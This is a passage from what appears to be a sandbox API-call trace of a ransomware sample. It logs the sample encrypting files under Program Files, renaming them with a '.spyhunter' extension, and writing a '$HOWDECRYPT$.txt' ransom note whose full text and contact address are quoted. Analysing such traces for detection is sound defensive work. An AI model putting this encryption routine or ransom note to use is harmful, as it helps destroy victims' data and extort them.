Maker\\Shared\\DvdStyles\\OldAge\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.761] GetProcessHeap () returned 0x2c0000 [0092.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0092.761] GetProcessHeap () returned 0x2c0000 [0092.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x381880 | out: hHeap=0x2c0000) returned 1 [0092.761] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fa58 | out: pbBuffer=0x270fa58) returned 1 [0092.761] GetProcessHeap () returned 0x2c0000 [0092.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0092.761] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270fa50*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270fa50*=0x30) returned 1 [0092.761] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.761] GetProcessHeap () returned 0x2c0000 [0092.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0092.761] GetProcessHeap () returned 0x2c0000 [0092.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x355888 | out: hHeap=0x2c0000) returned 1 [0092.762] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fa58 | out: pbBuffer=0x270fa58) returned 1 [0092.762] GetProcessHeap () returned 0x2c0000 [0092.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0092.762] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270fa50*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270fa50*=0x30) returned 1 [0092.762] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\decorative_rule.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\decorative_rule.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.762] GetProcessHeap () returned 0x2c0000 [0092.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0092.762] GetProcessHeap () returned 0x2c0000 [0092.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346648 | out: hHeap=0x2c0000) returned 1 [0092.762] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fa50 | out: pbBuffer=0x270fa50) returned 1 [0092.762] GetProcessHeap () returned 0x2c0000 [0092.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0092.762] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270fa48*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270fa48*=0x30) returned 1 [0092.762] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\15x15dot.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\15x15dot.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.762] GetProcessHeap () returned 0x2c0000 [0092.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0092.762] GetProcessHeap () returned 0x2c0000 [0092.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x358060 | out: hHeap=0x2c0000) returned 1 [0092.762] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fa50 | out: pbBuffer=0x270fa50) returned 1 [0092.763] GetProcessHeap () returned 0x2c0000 [0092.763] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0092.763] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270fa48*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270fa48*=0x30) returned 1 [0092.763] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\1047x576black.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.763] GetProcessHeap () returned 0x2c0000 [0092.763] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0092.763] GetProcessHeap () returned 0x2c0000 [0092.763] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346d48 | out: hHeap=0x2c0000) returned 1 [0092.763] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fa48 | out: pbBuffer=0x270fa48) returned 1 [0092.763] GetProcessHeap () returned 0x2c0000 [0092.763] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0092.763] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270fa40*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270fa40*=0x30) returned 1 [0092.763] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.763] GetProcessHeap () returned 0x2c0000 [0092.763] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0092.763] GetProcessHeap () returned 0x2c0000 [0092.763] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3554a8 | out: hHeap=0x2c0000) returned 1 [0092.763] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fa48 | out: pbBuffer=0x270fa48) returned 1 [0092.763] GetProcessHeap () returned 0x2c0000 [0092.763] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0092.763] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270fa40*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270fa40*=0x30) returned 1 [0092.764] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.764] GetProcessHeap () returned 0x2c0000 [0092.764] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0092.764] GetProcessHeap () returned 0x2c0000 [0092.764] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3782a8 | out: hHeap=0x2c0000) returned 1 [0092.764] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fa40 | out: pbBuffer=0x270fa40) returned 1 [0092.764] GetProcessHeap () returned 0x2c0000 [0092.764] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0092.764] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270fa38*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270fa38*=0x30) returned 1 [0092.764] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.772] GetProcessHeap () returned 0x2c0000 [0092.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0092.772] GetProcessHeap () returned 0x2c0000 [0092.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x355790 | out: hHeap=0x2c0000) returned 1 [0092.773] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x174 [0092.773] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0092.773] WriteFile (in: hFile=0x174, lpBuffer=0x270f973*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270fa9c, lpOverlapped=0x0 | out: lpBuffer=0x270f973*, lpNumberOfBytesWritten=0x270fa9c*=0x127, lpOverlapped=0x0) returned 1 [0092.774] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0092.774] WriteFile (in: hFile=0x174, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270fa9c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270fa9c*=0x2ac, lpOverlapped=0x0) returned 1 [0092.774] CloseHandle (hObject=0x174) returned 1 [0092.775] GetProcessHeap () returned 0x2c0000 [0092.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346728 | out: hHeap=0x2c0000) returned 1 [0092.775] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fa38 | out: pbBuffer=0x270fa38) returned 1 [0092.775] GetProcessHeap () returned 0x2c0000 [0092.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0092.775] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270fa30*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270fa30*=0x30) returned 1 [0092.775] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_select-highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\title_select-highlight.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.777] GetProcessHeap () returned 0x2c0000 [0092.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0092.777] GetProcessHeap () returned 0x2c0000 [0092.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f5f8 | out: hHeap=0x2c0000) returned 1 [0092.777] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fa38 | out: pbBuffer=0x270fa38) returned 1 [0092.777] GetProcessHeap () returned 0x2c0000 [0092.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0092.777] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270fa30*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270fa30*=0x30) returned 1 [0092.777] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_content-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\title_content-background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.810] GetProcessHeap () returned 0x2c0000 [0092.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0092.810] GetProcessHeap () returned 0x2c0000 [0092.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3555a0 | out: hHeap=0x2c0000) returned 1 [0092.810] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fa30 | out: pbBuffer=0x270fa30) returned 1 [0092.810] GetProcessHeap () returned 0x2c0000 [0092.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0092.810] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270fa28*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270fa28*=0x30) returned 1 [0092.810] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\BIGFONT.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\bigfont.shx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x174 [0092.810] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\BIGFONT.SHX") returned 81 [0092.810] StrStrW (lpFirst="BIGFONT.SHX", lpSrch=".txt") returned 0x0 [0092.810] GetProcessHeap () returned 0x2c0000 [0092.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c238e0 [0092.810] ReadFile (in: hFile=0x174, lpBuffer=0x2c238e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f9ec, lpOverlapped=0x0 | out: lpBuffer=0x2c238e0*, lpNumberOfBytesRead=0x270f9ec*=0x2800, lpOverlapped=0x0) returned 1 [0092.897] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.897] WriteFile (in: hFile=0x174, lpBuffer=0x2c238e0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f9ec, lpOverlapped=0x0 | out: lpBuffer=0x2c238e0*, lpNumberOfBytesWritten=0x270f9ec*=0x2800, lpOverlapped=0x0) returned 1 [0092.898] GetProcessHeap () returned 0x2c0000 [0092.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c238e0 | out: hHeap=0x2c0000) returned 1 [0092.899] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.899] WriteFile (in: hFile=0x174, lpBuffer=0x270fa2c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f9ec, lpOverlapped=0x0 | out: lpBuffer=0x270fa2c*, lpNumberOfBytesWritten=0x270f9ec*=0x4, lpOverlapped=0x0) returned 1 [0093.001] WriteFile (in: hFile=0x174, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f9ec, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f9ec*=0x30, lpOverlapped=0x0) returned 1 [0093.001] CloseHandle (hObject=0x174) returned 1 [0093.033] GetProcessHeap () returned 0x2c0000 [0093.033] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c21098 [0093.033] wnsprintfW (in: pszDest=0x2c21098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\BIGFONT.SHX.spyhunter") returned 91 [0093.033] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\BIGFONT.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\bigfont.shx"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\BIGFONT.SHX.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\bigfont.shx.spyhunter")) returned 1 [0093.034] GetProcessHeap () returned 0x2c0000 [0093.034] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c21098 | out: hHeap=0x2c0000) returned 1 [0093.034] GetProcessHeap () returned 0x2c0000 [0093.034] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0093.034] GetProcessHeap () returned 0x2c0000 [0093.034] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34e8d8 | out: hHeap=0x2c0000) returned 1 [0093.034] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fa30 | out: pbBuffer=0x270fa30) returned 1 [0093.034] GetProcessHeap () returned 0x2c0000 [0093.034] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0093.034] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270fa28*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270fa28*=0x30) returned 1 [0093.034] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\Panel_Mask_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\panel_mask_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.066] GetProcessHeap () returned 0x2c0000 [0093.066] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0093.066] GetProcessHeap () returned 0x2c0000 [0093.066] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34ef68 | out: hHeap=0x2c0000) returned 1 [0093.066] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fa28 | out: pbBuffer=0x270fa28) returned 1 [0093.066] GetProcessHeap () returned 0x2c0000 [0093.066] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0093.066] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270fa20*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270fa20*=0x30) returned 1 [0093.066] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1AR.LEX" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1ar.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x174 [0093.066] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1AR.LEX") returned 70 [0093.066] StrStrW (lpFirst="MSB1AR.LEX", lpSrch=".txt") returned 0x0 [0093.066] GetProcessHeap () returned 0x2c0000 [0093.066] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c238e0 [0093.066] ReadFile (in: hFile=0x174, lpBuffer=0x2c238e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f9e4, lpOverlapped=0x0 | out: lpBuffer=0x2c238e0*, lpNumberOfBytesRead=0x270f9e4*=0x2800, lpOverlapped=0x0) returned 1 [0093.107] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.107] WriteFile (in: hFile=0x174, lpBuffer=0x2c238e0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f9e4, lpOverlapped=0x0 | out: lpBuffer=0x2c238e0*, lpNumberOfBytesWritten=0x270f9e4*=0x2800, lpOverlapped=0x0) returned 1 [0093.108] GetProcessHeap () returned 0x2c0000 [0093.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c238e0 | out: hHeap=0x2c0000) returned 1 [0093.108] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.108] WriteFile (in: hFile=0x174, lpBuffer=0x270fa24*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f9e4, lpOverlapped=0x0 | out: lpBuffer=0x270fa24*, lpNumberOfBytesWritten=0x270f9e4*=0x4, lpOverlapped=0x0) returned 1 [0093.191] WriteFile (in: hFile=0x174, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f9e4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f9e4*=0x30, lpOverlapped=0x0) returned 1 [0093.192] CloseHandle (hObject=0x174) returned 1 [0093.269] GetProcessHeap () returned 0x2c0000 [0093.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c21098 [0093.269] wnsprintfW (in: pszDest=0x2c21098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1AR.LEX.spyhunter") returned 80 [0093.301] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1AR.LEX" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1ar.lex"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1AR.LEX.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1ar.lex.spyhunter")) returned 1 [0093.302] GetProcessHeap () returned 0x2c0000 [0093.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c21098 | out: hHeap=0x2c0000) returned 1 [0093.302] GetProcessHeap () returned 0x2c0000 [0093.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0093.302] GetProcessHeap () returned 0x2c0000 [0093.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e050 | out: hHeap=0x2c0000) returned 1 [0093.302] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\videowall\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x174 [0093.302] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0093.302] WriteFile (in: hFile=0x174, lpBuffer=0x270f95b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270fa84, lpOverlapped=0x0 | out: lpBuffer=0x270f95b*, lpNumberOfBytesWritten=0x270fa84*=0x127, lpOverlapped=0x0) returned 1 [0093.303] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0093.303] WriteFile (in: hFile=0x174, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270fa84, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270fa84*=0x2ac, lpOverlapped=0x0) returned 1 [0093.303] CloseHandle (hObject=0x174) returned 1 [0093.304] GetProcessHeap () returned 0x2c0000 [0093.304] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346e28 | out: hHeap=0x2c0000) returned 1 [0093.304] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fa20 | out: pbBuffer=0x270fa20) returned 1 